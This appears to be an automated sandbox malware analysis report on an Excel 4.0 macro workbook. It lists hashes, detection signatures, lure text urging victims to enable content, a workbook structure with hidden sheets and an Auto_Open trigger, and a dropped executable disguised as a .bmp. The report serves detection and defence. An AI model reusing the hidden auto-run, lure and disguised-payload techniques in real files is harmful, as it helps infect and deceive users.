Loading ...

Play interactive tourEdit tour

Analysis Report 4468873941_759979693.xlsm

Overview

General Information

Sample Name:4468873941_759979693.xlsm
Analysis ID:412575
MD5:b5021bc6cc8e2fc2231978d6c9118f2a
SHA1:c11430e1206f25bf768f1643f51bed8a4a1eec9d
SHA256:5600e318bd25cb62a710d880649b11c4d85ae6f8ee5c2084a9d819a16abcd3b2
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected MalDoc1
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
PE file contains strange resources
Unable to load, office file is protected or invalid

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6264 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: BBD11366.bmp.0.dr

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: BBD11366.bmp.0.drJump to dropped file

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.aadrm.com/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.cortana.ai
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.office.net
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.onedrive.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://augloop.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://cdn.entity.
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://clients.config.office.net/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://config.edge.skype.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://cortana.ai
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://cortana.ai/api
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://cr.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://dev.cortana.ai
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://devnull.onenote.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://directory.services.
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://graph.windows.net
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://graph.windows.net/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://lifecycle.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://login.windows.local
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://management.azure.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://management.azure.com/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://messaging.office.com/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://ncus.contentsync.
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://officeapps.live.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://onedrive.live.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://outlook.office.com/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://outlook.office365.com/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://settings.outlook.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://staging.cortana.ai
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://tasks.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://wus2.contentsync.
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
    Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: 4468873941_759979693.xlsmInitial sample: EXEC
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBD11366.bmpJump to dropped file
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBD11366.bmp D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{121D364D-A553-4376-9A63-D54AB3450050}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="3" state="hidden" r:id="rId2"/><sheet name="Nolaert" sheetId="2" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Nolaert!$AK$7</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: BBD11366.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: BBD11366.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: BBD11366.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: BBD11366.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: BBD11366.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: BBD11366.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: BBD11366.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: BBD11366.bmp.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow title found: microsoft excel okcannot run 'tar.exe'. the program or one of its components is damaged or missing.
    Source: classification engineClassification label: mal72.troj.expl.evad.winXLSM@1/10@0/0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{7E4609B5-A5AA-42E3-B447-AE19427BE656} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 4468873941_759979693.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
    Source: 4468873941_759979693.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: 4468873941_759979693.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: BBD11366.bmp.0.dr
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBD11366.bmpJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBD11366.bmpJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
